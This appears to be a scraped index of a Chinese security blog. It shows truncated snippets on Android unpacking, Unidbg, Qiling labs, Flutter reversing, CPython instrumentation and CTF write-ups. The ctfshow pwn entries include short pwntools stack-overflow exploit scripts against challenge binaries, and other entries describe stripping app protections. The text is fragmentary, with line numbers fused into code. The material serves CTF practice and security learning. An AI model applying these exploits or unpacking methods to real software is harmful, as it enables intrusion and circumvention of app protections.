12345678910111213141516171819202122232425262728293031323334353637383940414243444546https://www.yuque.com/lilac-2hqvv/xdwlsg/idgio0?singleDoc#%20%E3%80%8AUnidbg%20%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BB%8B%E7%BB%8D%E3%80%8Bhttps://www.yuque.com/lilac-2hqvv/xdwlsg/gri3ins5e22b5x7o?#%20%E3%80%8AUnidbg%20%E7%9A%84%E4%BD%BF%E7%94%A8%E5%9C%BA%E6%99%AF%E3%80%8Bhttps://www.yuque.com/lilac-2hqvv/xdwlsg/gmbn45b5n6g59kks?#%20%E3%80%8AUnidbg%20%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8%EF%BC%88%E4%B8%80%EF%BC% ...
GD11234567891011121314151617181920212223242526272829def decode_binary_string(binary_str): result = "" for i in range(0, len(binary_str), 12): chunk = binary_str[i:i+12] if len(chunk) != 12: break # 忽略不完整的12位组 # 分割为4-4-4 hundreds = chunk[0:4] tens = chunk[4:8] units = chunk[8:12] # 转换为十进制 hundreds_dec = int(hundreds, 2) tens_dec = int(tens, 2) units_dec = int(units, 2) ...
加固加壳app的运行流程参考[原创]FART:ART环境下基于主动调用的自动化脱壳方案-Android安全-看雪-安全社区|安全招聘|kanxue.com
BaseDexClassLoader.java - Android Code Search
unpacker/android-7.1.2_r33/art/runtime/unpacker/unpacker.cc at master · Youlor/unpacker
Android加壳与脱壳(7)——Fdex2源码解析和frida版本实现 | 安全后厨团队
123456789101112131415161718192021222324252627package com.grand.packer;import androidx.appcompat.app.AppCompatActivity;import android.app.Application;import android.content.Context;import android.os.Bundle;impor ...
qiling-labs练习参考Hijack - Qiling Framework Documentation
QilingLab Quickstart - Autumnal
屏蔽器 - QilingLab – 发布
环境搭建12345pip install qilinggit clone https://github.com/qilingframework/qiling.gitcd qilinggit submodule update --init --recursivepip install .
基础模板1234567891011from qiling import *def challenge1(ql: Qiling): passif __name__ == '__main__': path = ['qilinglab-x86_64'] # 我们的目标 rootfs = "./qiling/examples/rootfs/x8664_linux" # 在你clone下来的仓库里 ql = ...
obfusheader.h去除花指令 由于太多了直接使用脚本 一键处理
123456789startaddr = 0x7FF6E76C1000endaddr = 0x7FF6E76f5000//text段for i in range(startaddr, endaddr): if get_wide_byte(i) == 0x74: if get_wide_byte(i + 2) == 0x0: patch_byte((i + 2), 0x90) print("[+] Addr {} is patched".format(hex(i + 2)))
直接字符串查找定位 启动调试 输入长度为0x28
1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
打上读写断点 直接f9
第一次到了这里计算了长度
这里进行xor 提取也简单 拿加密完成的和明文xor一下就行
再次f9
高低位呼唤加取反
再次f9到了这里就是密文
123456789101 ...
修改cpython源码实现插桩参考2024 Ciscn长城杯铁人三项 逆向题Cython_[长城杯 2024]cython-CSDN博客
编译1git checkout 3.11
修改要的版本
直接执行
第一次就是有点慢
修改目标E:\cpython\Objects\abstract.c
测试样例就是ciscn2024的cython题
12345678910111213141516171819import ez flag = "a"*24flag1 = list(flag)value = []b = 0ck = 0if len(flag1) == 24: for i in range(0,len(flag1),4): b = ord(flag1[i]) << 24 | ord(flag1[i+1]) << 6 | ord(flag1[i+2]) << 8 | ord(flag1[i+3]) value.append(b) key = [102, 108, 97, 103]flag_encrypt = [] ...
flutterpro参考https://github.com/worawit/blutter
Android-Flutter逆向 | LLeaves Blog
[原创]flutter逆向 ACTF native app-Android安全-看雪-安全社区|安全招聘|kanxue.com
吾爱破解安卓逆向入门教程《安卓逆向这档事》番外实战篇3-拨云见日之浅谈Flutter逆向_哔哩哔哩_bilibili
123git clone https://github.com/worawit/blutter --depth=1cd .\blutter\python .\scripts\init_env_win.py
初始化一下
然后讲libapp和libflutter丢进新建的文件夹方便查找
1python .\blutter.py ..\chall\lib\arm64-v8a\ .\output
最后会得到这些内容 其中的ida_script就可以用来恢复libapp的符号
js则是实例的frida模板
可以看到在没还原之前都是一坨 使用了脚本以后就好了很多
flutter ...
ctfshow刷题wp栈溢出pwn36
12345678from pwn import *p = process('./pwn')# p = remote('pwn.challenge.ctf.show', 28250)payload = cyclic(0x28+4) + p32(0x8048586)p.sendline(payload)p.interactive()
pwn37
1234567891011from pwn import *p = process('./pwn')# p = remote('pwn.challenge.ctf.show', 28250)get_flag = 0x08048521payload = cyclic(0x12 + 0x4) + p32(get_flag)p.sendline(payload)p.interactive()
pwn38涉及到了栈对齐
123456789101112131415from pwn import *p = process( ...
l3hctf参考Tauri 框架的静态资源提取方法探究 | yllhwa's blog
oacia/stalker_trace_so: 一个IDA插件,利用frida-stalker在加载so时打印出所有函数调用,解决frida-trace无法在so加载时trace的问题
frida-stalker-trace 使用并实战某音 | mgaic
ez_android一开始想拿插件去trace的但是崩溃了 但是这个题不用trace也能做
tauriactivity的app 解包静态资源
分别对应文件名及其长度 文件内容及其长度
1234567891011121314151617181920212223242526272829303132333435363738394041424344import osimport brotliaddr = 0xC9498 # 这里的地址是压缩内容的地址endadd = 0xC9498+0xebdump = [0] * (endadd - addr)for i in range(addr, endadd): d ...



























